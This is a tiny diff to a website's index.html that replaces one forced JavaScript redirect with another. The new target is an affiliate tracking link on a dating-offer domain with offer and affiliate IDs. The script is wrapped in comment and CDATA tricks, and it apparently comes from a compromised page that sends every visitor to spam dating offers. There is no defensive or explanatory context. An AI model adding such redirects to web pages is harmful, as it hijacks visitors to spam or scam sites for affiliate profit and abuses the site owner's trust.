--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <script><!--//--><![CDATA[// ><!--
-location.href="https://jhaedj.datedat.com/s/6345b3c21b07d"
+location.href="https://trck.singledates.xyz//tr?offer_id=432&aff_id=202"
 //--><!]]]]><![CDATA[>
 
 //--><!
